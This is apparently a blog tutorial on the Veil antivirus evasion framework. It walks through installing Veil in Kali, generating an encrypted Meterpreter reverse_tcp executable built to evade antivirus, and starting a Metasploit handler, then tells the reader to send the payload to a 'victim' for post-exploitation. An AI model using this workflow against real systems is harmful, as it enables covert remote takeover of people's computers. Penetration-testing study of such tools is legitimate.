#avlol

Veil, an antivirus evasion tool, created by Chris Truncer, Mike Wright, and The Grayhound was recently added to the Kali repositories. The developers presented it at NoVA Hackers some weeks ago and it really sparked my interest. I haven’t had much opportunity to test the payloads it creates, however I have heard of numerous successes with it.

Before we get started, PLEASE do not submit your payloads to VirusTotal!

Installation

Since Veil is now in the Kali repositories, a simple apt-get will install it for you.

apt-get update && apt-get install veil

This method, however, does not ensure that you are using the bleeding-edge release of Veil, so you can also pull the project down from Github.

git clone https://github.com/veil-evasion/Veil.git
cd Veil/setup/
./setup.sh

Creating a Windows payload

Once installed, start Veil (veil for the apt-get method, ./Veil.py for git). This will load the framework and its current 20 payloads. For the sake of simplicity, we will create a reverse_tcp Meterpreter payload.

First, list all of the available payloads.

list

This will show the available payload names and their rating. For more information on a payload, type:

info $num

where the $num is the number next to the payload.

Choose number 13, python/AESEncrypted.

The options are set similarly to Metasploit, so this should be old-hat. If you’d like to use pyherion, for example, the syntax would be:

set use_pyherion Y

Now type generate to start generating the payload. The next section will allow you to choose a source for your shellcode. You can either use msfvenom or provide your custom shellcode. Here, we’ll opt for msfvenom.

Hit Enter to select the windows/meterpreter/reverse_tcp payload. Again, you can use whatever payload you’d like. Now, enter the LHOST address (where you want the connection to come back to) and the LPORT number (port to connect back on). Finally, you can enter any other msfvenom options in OPTION=value syntax, but we’ll skip that for now.

Once you hit Enter, it will generate your shellcode and prompt you to name your payload. Obviously you can change this to whatever you want at a later time, so just name it something easy to remember for the time being. Then you will be prompted to select the method for creating the executable (in this case Pyinstaller or Py2Exe). Choose Pyinstaller and run.

The payload is now created and a bit of information about it is shown in the terminal. The executable will be dropped in ~/veil-output/sources/ and an RC file will be dropped in ~/veil-output/handlers/

Receiving sessions

As you may have noticed in the last section, Veil makes an RC file when the payload is generated. This will be used with Metasploit to set up a handler to listen for incoming connections.

To set up the handler, navigate into the handler directory (~/veil-output/handlers/) and run this command with your handler name substituted:

msfconsole -r payload_handler.rc

The handler will be running as a background job awaiting the callback from the payload.

Finally, send the payload out to your victim via your method of choice. Once they click it and it executes, you will have your standard meterpreter session and you can start post exploitation and/or pivoting.

More information

There are numerous guides posted the Veil website showing exactly how to use this method and numerous others to create payloads. The devopers are also on Twitter, @ChrisTruncer @TheMightyShiv @the_grayhound

https://www.veil-evasion.com/guidesvideos/